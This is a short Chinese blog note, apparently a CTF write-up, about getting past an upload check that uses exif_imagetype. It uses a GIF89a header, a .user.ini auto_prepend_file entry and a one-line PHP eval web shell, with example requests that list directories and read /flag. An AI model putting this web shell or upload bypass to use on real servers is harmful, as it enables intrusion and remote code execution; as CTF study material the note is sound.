Checkin

1

常规步骤之后,上传了.htaccess文件,不过发现被限制了。

返回了一个:

1
2

exif_imagetype:not image!

exif_imagetype函数

简单来说就是,上传文件白名单机制。

QAQ

新英雄登场

.user.ini文件

php目录配置文件,作用为:

当我们访问目录中的任何php文件时,都会调用.user.ini中指的文件以php的形式进行读取。

文件内容为

1
2
3
4

GIF89a

auto_prepend_file=po.jpg

之后就可以常规步骤一顿操作。

2

这里也有了新一种方法用传进去的cmd 进行rce——其前提是传入的木马文件内容为:

1
2
3
4

GIF89a

<script language='php'>eval($_REQUEST['cmd']);</script>

然后

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

uploads/xxx/index.php?cmd=var_dump(scandir("/")); // 扫描当前目录下的文件,并打印出来

  

uploads/xxx/index.php?cmd=system('cat /flag');

  

uploads/xxx/index.php?cmd=var_dump(file_get_contents("/flag"));

3

ps:图片文件头前缀(作用是?)

1
2
3
4
5
6
7
8

JPG:FF D8 FF E0 00 10 4A 46 49 46(16进制编码)

GIF:47 49 46 38 39 61(ascll值是GIF89a)

PNG: 89 50 4E 47

  

参考一下

常见文件头/尾总结

php解析文件值得关注


2024:现在看起来好肤浅的笔记……

Licensed under CC BY-NC-SA 4.0
comments powered by Disqus
Built with Hugo
Theme Stack designed by Jimmy